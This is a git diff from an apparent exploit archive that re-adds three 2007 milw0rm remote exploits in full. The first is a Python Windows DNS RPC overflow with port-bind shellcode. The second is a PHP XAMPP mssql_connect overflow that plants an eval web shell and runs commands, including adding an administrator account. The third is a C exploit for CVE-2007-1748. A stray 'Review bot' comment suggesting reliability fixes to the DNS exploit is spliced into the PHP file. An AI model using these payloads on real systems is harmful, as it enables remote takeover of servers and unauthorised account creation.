if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): - port = entry.get_string_binding().split('[')[1][:-1] - return int(port) - - print '[-] Could not locate DNS port; Target might not be running DNS' - -def ExploitDNS(target, port): - trans = transport.TCPTransport(target, port) - trans.connect() - dce = dcerpc.DCERPC_v5(trans) - dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) - - dce.call(0x01, stub) - -def ConnectRemoteShell(target): - connect = "/usr/bin/telnet " + target + " 4444" - os.system(connect) - -if __name__ == '__main__': - try: - target = sys.argv[1] - except IndexError: - print 'Usage: %s ' % sys.argv[0] - sys.exit(-1) - - print '[+] Locating DNS RPC port' - port = DiscoverDNSport(target) - print '[+] Located DNS RPC service on TCP port: %d' % port - ExploitDNS(target, port) - print '[+] Exploit sent. Connecting to shell in 3 seconds' - time.sleep(3) - ConnectRemoteShell(target) - -# milw0rm.com [2007-04-15] +#!/usr/bin/python +# Remote exploit for the 0day Windows DNS RPC service vulnerability as +# described in http://www.securityfocus.com/bid/23470/info. Tested on +# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 +# and then connects to it. +# +# Cheers to metasploit for the first exploit. +# Written for educational and testing purposes. 
+# Author shall bear no responsibility for any damage caused by using this code +# Winny Thomas :-) + +import os +import sys +import time +from impacket.dcerpc import transport, dcerpc, epm +from impacket import uuid + +#Portbind shellcode from metasploit; Binds port to TCP port 4444 +shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" +shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" +shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" +shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" +shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" +shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" +shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" +shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" +shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" +shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" +shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" +shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" +shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" +shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" +shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" +shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" +shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" +shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" +shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" +shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" +shellcode += 
"\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" +shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" + +# Stub sections taken from metasploit +stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' +stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' +stub += '\x00\x00\x00\x00\x12\x05\x00\x00' +stub += '\\A' * 465 +# At the time of overflow ESP points into our buffer which has each char +# prepended by a '\' and our shellcode code is about 24+ bytes away from +# where EDX points +stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll +# The following B's which in assembly translates to 'inc EDX' increments +# about 31 times EDX so that it points into our shellcode +stub += '\\B' * 43 +# Translates to 'jmp EDX' +stub += '\\\xff\\\xe2' +stub += '\\A' * 134 +stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' +stub += '\x03\x00\x00\x00\x47\x00\x00\x00' +stub += shellcode + +# Code ripped from core security document on impacket +# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf +# Not a neat way to discover a dynamic port :-) +def DiscoverDNSport(target): + trans = transport.SMBTransport(target, 139, 'epmapper') + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) + pm = epm.DCERPCEpm(dce) + handle = '\x00'*20 + while 1: + dump = pm.portmap_dump(handle) + if not dump.get_entries_num(): + break + handle = dump.get_handle() + entry = dump.get_entry().get_entry() + if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): + port = entry.get_string_binding().split('[')[1][:-1] + return int(port) + + print '[-] Could not locate DNS port; Target might not be running DNS' + +def ExploitDNS(target, port): + trans = transport.TCPTransport(target, port) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + 
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) + + dce.call(0x01, stub) + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + +if __name__ == '__main__': + try: + target = sys.argv[1] + except IndexError: + print 'Usage: %s ' % sys.argv[0] + sys.exit(-1) + + print '[+] Locating DNS RPC port' + port = DiscoverDNSport(target) + print '[+] Located DNS RPC service on TCP port: %d' % port + ExploitDNS(target, port) + print '[+] Exploit sent. Connecting to shell in 3 seconds' + time.sleep(3) + ConnectRemoteShell(target) + +# milw0rm.com [2007-04-15] diff --git a/platforms/windows/remote/3738.php b/platforms/windows/remote/3738.php index 529a9b8ed..4e1ef793d 100755 --- a/platforms/windows/remote/3738.php +++ b/platforms/windows/remote/3738.php @@ -1,224 +1,224 @@ -Connect($_POST['host'], $_POST['user'], $_POST['password'], $_POST['database']); - echo "
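Review bot: `DiscoverDNSport` falls off the end after printing `'[-] Could not locate DNS port; Target might not be running DNS'` and so returns None, which makes the caller's `print '[+] Located DNS RPC service on TCP port: %d' % port` raise a TypeError instead of exiting cleanly; add `sys.exit(-1)` right after that print. Separately, `ConnectRemoteShell` passes the unvalidated `target` from `sys.argv[1]` into `os.system("/usr/bin/telnet " + target + " 4444")`, so shell metacharacters in that argument are executed on the operator's own host; `subprocess.call(['/usr/bin/telnet', target, '4444'])` runs telnet without a shell. Both issues are on the new side of the file and are untouched by this commit.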

    DBServer: $_POST[dbserver]

    "; - $result = $db->Execute("SELECT * FROM $_POST[table]"); -... - -mssql_connect() function is vulnerable to buffer overflow and -the host argument is totally unchecked. Also this shows a vulnerabilty in -ADODB library (which is in the include path, inside PEAR folder) in the -Connect method . - -If you say that this should be not used for production purpose or -exposed to the outside world, try theese google dorks: - -intitle:XAMPP intitle:windows intitle:version -intitle:XAMPP intitle:version intitle:1.6.0a +windows - -note: I could use the INTO OUTFILE method through sql injection -to export some shell inside the /htdocs folder because we have FILE -privilege, but we have magic_quotes_gpc on here. This is instead -possbile through the PhpMyAdmin default user/password. -note ii: PHP version is 5.2.1 -note iii: bof is possible because mssql extension is enabled -by default in php.ini -*/ - -if ($argc<2) { - print_r(' ---------------------------------------------------------------------------- -Usage: php '.$argv[0].' host cmd OPTIONS -host: target server (ip/hostname) -cmd: a shell command -Options: - -p[port]: specify a port other than 80 - -P[ip:port]: specify a proxy - -S only send the second packet -Example: -php '.$argv[0].' localhost VER -P1.1.1.1:80 -php '.$argv[0].' 
localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP -Administrators /ADD sun -p81 -S ---------------------------------------------------------------------------- -'); - die; -} -error_reporting(7); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacketii($packet,$want_out) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],(int)$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($want_out){ - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - } - fclose($ock); -} - -$host=$argv[1]; -$port=80; -$proxy=""; -$cmd=""; -$send_bof=true; -for ($i=2; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") -and ($temp<>"-P") -and ($temp<>"-S") -){ - $cmd.=" ".$argv[$i]; -} -if ($temp=="-p") -{ - $port=(int)str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -if ($temp=="-S") -{ - $send_bof=false; -} -} -if ($proxy=='') {$p="";} else {$p='http://'.$host.':'.$port;} - -//bad chars -> \x00,\x22,\x27,\x5c thoose affected by magic_quotes_gpc -//102 bytes execute command one by me... -//cmd.exe /c echo ^ > ./htdocs/xampp/s.php & - -if ($send_bof){ -$____scode= -"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53". -"\xbb\xca\x73\xe9\x77". //WinExec, kernel32.dll -"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff\x63\x6d\x64". -"\x2e\x65\x78\x65\x20\x2f\x63\x20\x65\x63\x68\x6f". -"\x20\x5e\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c". -"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54". -"\x54\x50\x5f\x43\x5d\x29\x3b\x3f\x5e\x3e\x20\x3e". -"\x20\x2e\x2f\x68\x74\x64\x6f\x63\x73\x2f\x78\x61". -"\x6d\x70\x70\x2f\x73\x2e\x70\x68\x70\x20\x26\x20". 
-"\xff"; - -//some junk to make this adjustable for sp4 -//eip = ecx -$eip="\x47\x30\xE9\x77"; //0x77E93047 pop ECX - pop - retbis kernel32.dll and further ja short -$jmp="\xeb\x8b\x90\x90"; //jmp short -$____suntzu=str_repeat("\x90",1932-strlen($____scode)).$____scode."\x90\x90\x90\x90\x90\x90\x90\x90".$jmp.$eip; - -$data ="-----------------------------7d61bcd1f033e\r\n"; -$data.="Content-Disposition: form-data; name=\"dbserver\";\r\n\r\n"; -$data.="mssql\r\n"; -$data.="-----------------------------7d61bcd1f033e\r\n"; -$data.="Content-Disposition: form-data; name=\"host\";\r\n\r\n"; -$data.="$____suntzu\r\n"; -$data.="-----------------------------7d61bcd1f033e\r\n"; -$data.="Content-Disposition: form-data; name=\"adodb\";\r\n\r\n"; -$data.="submit\r\n"; -$data.="-----------------------------7d61bcd1f033e\r\n"; -$data.="Content-Disposition: form-data; name=\"user\";\r\n\r\n"; -$data.="1\r\n"; -$data.="-----------------------------7d61bcd1f033e\r\n"; -$data.="Content-Disposition: form-data; name=\"password\";\r\n\r\n"; -$data.="1\r\n"; -$data.="-----------------------------7d61bcd1f033e\r\n"; -$data.="Content-Disposition: form-data; name=\"database\";\r\n\r\n"; -$data.="1\r\n"; -$data.="-----------------------------7d61bcd1f033e--\r\n"; -$packet ="POST $p/xampp/adodb.php HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet,0); -sleep(2); -} - -echo "cmd -> ".$cmd."\n"; - -$packet ="GET $p/xampp/s.php HTTP/1.0\r\n"; -$packet.="C: error_reporting(E_ALL);set_time_limit(0);echo \"_delim_\";passthru(\$_SERVER[HTTP_CMD]);echo \"_delim_\";\r\n"; -$packet.="CMD: $cmd\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet,1); -$out=explode("_delim_",$html); -echo $out[1]; -?> - -# milw0rm.com [2007-04-15] 
+Connect($_POST['host'], $_POST['user'], $_POST['password'], $_POST['database']); + echo "

    DBServer: $_POST[dbserver]

    "; + $result = $db->Execute("SELECT * FROM $_POST[table]"); +... + +mssql_connect() function is vulnerable to buffer overflow and +the host argument is totally unchecked. Also this shows a vulnerabilty in +ADODB library (which is in the include path, inside PEAR folder) in the +Connect method . + +If you say that this should be not used for production purpose or +exposed to the outside world, try theese google dorks: + +intitle:XAMPP intitle:windows intitle:version +intitle:XAMPP intitle:version intitle:1.6.0a +windows + +note: I could use the INTO OUTFILE method through sql injection +to export some shell inside the /htdocs folder because we have FILE +privilege, but we have magic_quotes_gpc on here. This is instead +possbile through the PhpMyAdmin default user/password. +note ii: PHP version is 5.2.1 +note iii: bof is possible because mssql extension is enabled +by default in php.ini +*/ + +if ($argc<2) { + print_r(' +--------------------------------------------------------------------------- +Usage: php '.$argv[0].' host cmd OPTIONS +host: target server (ip/hostname) +cmd: a shell command +Options: + -p[port]: specify a port other than 80 + -P[ip:port]: specify a proxy + -S only send the second packet +Example: +php '.$argv[0].' localhost VER -P1.1.1.1:80 +php '.$argv[0].' 
localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP +Administrators /ADD sun -p81 -S +--------------------------------------------------------------------------- +'); + die; +} +error_reporting(7); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; + +function sendpacketii($packet,$want_out) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],(int)$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($want_out){ + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + } + fclose($ock); +} + +$host=$argv[1]; +$port=80; +$proxy=""; +$cmd=""; +$send_bof=true; +for ($i=2; $i<$argc; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") +and ($temp<>"-P") +and ($temp<>"-S") +){ + $cmd.=" ".$argv[$i]; +} +if ($temp=="-p") +{ + $port=(int)str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +if ($temp=="-S") +{ + $send_bof=false; +} +} +if ($proxy=='') {$p="";} else {$p='http://'.$host.':'.$port;} + +//bad chars -> \x00,\x22,\x27,\x5c thoose affected by magic_quotes_gpc +//102 bytes execute command one by me... +//cmd.exe /c echo ^ > ./htdocs/xampp/s.php & + +if ($send_bof){ +$____scode= +"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53". +"\xbb\xca\x73\xe9\x77". //WinExec, kernel32.dll +"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff\x63\x6d\x64". +"\x2e\x65\x78\x65\x20\x2f\x63\x20\x65\x63\x68\x6f". +"\x20\x5e\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c". +"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54". +"\x54\x50\x5f\x43\x5d\x29\x3b\x3f\x5e\x3e\x20\x3e". +"\x20\x2e\x2f\x68\x74\x64\x6f\x63\x73\x2f\x78\x61". +"\x6d\x70\x70\x2f\x73\x2e\x70\x68\x70\x20\x26\x20". 
+"\xff"; + +//some junk to make this adjustable for sp4 +//eip = ecx +$eip="\x47\x30\xE9\x77"; //0x77E93047 pop ECX - pop - retbis kernel32.dll and further ja short +$jmp="\xeb\x8b\x90\x90"; //jmp short +$____suntzu=str_repeat("\x90",1932-strlen($____scode)).$____scode."\x90\x90\x90\x90\x90\x90\x90\x90".$jmp.$eip; + +$data ="-----------------------------7d61bcd1f033e\r\n"; +$data.="Content-Disposition: form-data; name=\"dbserver\";\r\n\r\n"; +$data.="mssql\r\n"; +$data.="-----------------------------7d61bcd1f033e\r\n"; +$data.="Content-Disposition: form-data; name=\"host\";\r\n\r\n"; +$data.="$____suntzu\r\n"; +$data.="-----------------------------7d61bcd1f033e\r\n"; +$data.="Content-Disposition: form-data; name=\"adodb\";\r\n\r\n"; +$data.="submit\r\n"; +$data.="-----------------------------7d61bcd1f033e\r\n"; +$data.="Content-Disposition: form-data; name=\"user\";\r\n\r\n"; +$data.="1\r\n"; +$data.="-----------------------------7d61bcd1f033e\r\n"; +$data.="Content-Disposition: form-data; name=\"password\";\r\n\r\n"; +$data.="1\r\n"; +$data.="-----------------------------7d61bcd1f033e\r\n"; +$data.="Content-Disposition: form-data; name=\"database\";\r\n\r\n"; +$data.="1\r\n"; +$data.="-----------------------------7d61bcd1f033e--\r\n"; +$packet ="POST $p/xampp/adodb.php HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet,0); +sleep(2); +} + +echo "cmd -> ".$cmd."\n"; + +$packet ="GET $p/xampp/s.php HTTP/1.0\r\n"; +$packet.="C: error_reporting(E_ALL);set_time_limit(0);echo \"_delim_\";passthru(\$_SERVER[HTTP_CMD]);echo \"_delim_\";\r\n"; +$packet.="CMD: $cmd\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet,1); +$out=explode("_delim_",$html); +echo $out[1]; +?> + +# milw0rm.com [2007-04-15] 
diff --git a/platforms/windows/remote/3740.c b/platforms/windows/remote/3740.c
index 66fa1af72..e2f4ef221 100755
--- a/platforms/windows/remote/3740.c
+++ b/platforms/windows/remote/3740.c
@@ -1,193 +1,193 @@ -/* -* Copyright (c) 2007 devcode -* -* -* ^^ D E V C O D E ^^ -* -* Windows DNS DnssrvQuery() Stack Overflow -* [CVE-2007-1748] -* -* -* Description: -* A vulnerability has been reported in Microsoft Windows, which can -* be exploited by malicious people to compromise a vulnerable system. -* The vulnerability is caused due to a boundary error in an RPC interface -* of the DNS service used for remote management of the service. This can -* be exploited to cause a stack-based buffer overflow via a specially -* crafted RPC request. The DnssrvQuery function is vulnerable to this stack -* overflow. -* -* -* Hotfix/Patch: -* None as of this time. -* -* Vulnerable systems: -* Microsoft Windows 2000 Advanced Server -* Microsoft Windows 2000 Datacenter Server -* Microsoft Windows 2000 Server -* Microsoft Windows Server 2003 Datacenter Edition -* Microsoft Windows Server 2003 Enterprise Edition -* Microsoft Windows Server 2003 Standard Edition -* Microsoft Windows Server 2003 Web Edition -* Microsoft Windows Storage Server 2003 -* -* Tested on: -* Microsoft Windows 2000 Advanced Server -* -* This is a PoC and was created for educational purposes only. The -* author is not held responsible if this PoC does not work or is -* used for any other purposes than the one stated above. -* -* Notes: -* <3 Metasploit for releasing it yesterday, only had time to look at it -* this morning. Also props to Winny Thomas. -* -* There are two ways we can embed shellcode. One is to pad each byte of -* the shellcode with '\' and jmp EBX. The other way is the one Winny used -* which is to pass in the shellcode as the third argument in the rpc function -* and jmp EDX after incrementing it appropriately. I used the latter :) -* -* ^^ #pen15, InTeL, D-oNe and ps. 
St0n3y is nub kthxbye -* -* -*/ -#include -#include - -#pragma comment( lib, "ws2_32" ) - -/* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov -http://metasploit.com */ -unsigned char uszShellcode[] = - "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab" - "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2" - "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca" - "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56" - "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37" - "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe" - "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde" - "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04" - "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19" - "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8" - "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81" - "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba" - "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f" - "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d" - "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04" - "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb" - "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90" - "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96" - "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02" - "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85" - "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d" - "\x7d\xe0\xa6\xd2\xab\x1f\x00"; - -/* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */ -unsigned char uszDceBind[] = - "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00" - "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" - "\xA4\xC2\xAB\x50\x4D\x57\xB3\x40\x9D\x66\xEE\x4F\xD5\xFB\xA0\x76" - 
"\x05\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" - "\x2B\x10\x48\x60\x02\x00\x00\x00"; - -/* DnssrvQuery: opnum 1 */ -unsigned char uszDceCall[] = - "\x05\x00\x00\x83\x10\x00\x00\x00\x7f\x06\x00\x00\x01\x00\x00\x00" - "\x57\x06\x00\x00\x00\x00\x01\x00\xa4\xc2\xab\x50\x4d\x57\xb3\x40" - "\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x10\xc2\x40\x00\x02\x00\x00\x00" - "\x00\x00\x00\x00\x02\x00\x00\x00\x44\x00\x00\x00\x94\xfa\x13\x00" - "\xcc\x04\x00\x00\x00\x00\x00\x00\xcc\x04\x00\x00"; - -unsigned char uszDceEnd1[] = - "\x41\x00\xb8\xc0\x40\x00\x57\x01\x00\x00\x00\x00\x00\x00\x57\x01" - "\x00\x00"; - -unsigned char uszJmps[] = - /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */ - "\x5C\x29\x5C\x4C\x5C\xE1\x5C\x77" - - /* inc edx, jmp edx */ - "\x5C\x42\x5C\x42\x5C\x42\x5C\x42" - "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" - "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" - "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42" - "\x5C\x42\x5C\xFF\x5C\xE2"; - -void usage( ) { - printf("\n\t\tMicrosoft Windows DNS RPC Stack Overflow\n" - "\t\t\t(c) 2007 devcode\n\n" - "usage: dns.exe \n"); -} - -int main( int argc, char **argv ) { - WSADATA wsaData; - SOCKET sConnect; - SOCKADDR_IN sockAddr; - char szRecvBuf[4096]; - unsigned char uszPacket[1663]; - int nRet; - - if ( argc < 3 ) { - usage( ); - return -1; - } - - if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { - printf("[-] Unable to startup winsock\n"); - return -1; - } - - sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); - if ( sConnect == INVALID_SOCKET ) { - printf("[-] Invalid socket\n"); - return -1; - } - - sockAddr.sin_family = AF_INET; - sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); - sockAddr.sin_port = htons( atoi( argv[2] ) ); - - printf("[+] Connecting to %s:%s\n", argv[1], argv[2] ); - nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); - if ( nRet == SOCKET_ERROR ) { - 
closesocket( sConnect ); - printf("[-] Cannot connect to server\n"); - return -1; - } - - printf("[+] Sending DCE Bind packet...\n"); - nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); - if ( nRet == SOCKET_ERROR ) { - closesocket( sConnect ); - printf("[-] Cannot send\n"); - return -1; - } - - nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); - if ( nRet <= 0 ) { - closesocket( sConnect ); - printf("[-] Recv failed\n"); - return -1; - } - - memset( uszPacket, 0x5C, sizeof( uszPacket ) ); - memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 ); - memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 ); - memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) ); - memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) ); - - printf("[+] Sending DCE Request packet...\n"); - nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); - if ( nRet == SOCKET_ERROR ) { - closesocket( sConnect ); - printf("[-] Cannot send\n"); - return -1; - } - - printf("[+] Check shell on port 4444 :)\n"); - nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); - closesocket( sConnect ); - return 0; -} - -// milw0rm.com [2007-04-15] +/* +* Copyright (c) 2007 devcode +* +* +* ^^ D E V C O D E ^^ +* +* Windows DNS DnssrvQuery() Stack Overflow +* [CVE-2007-1748] +* +* +* 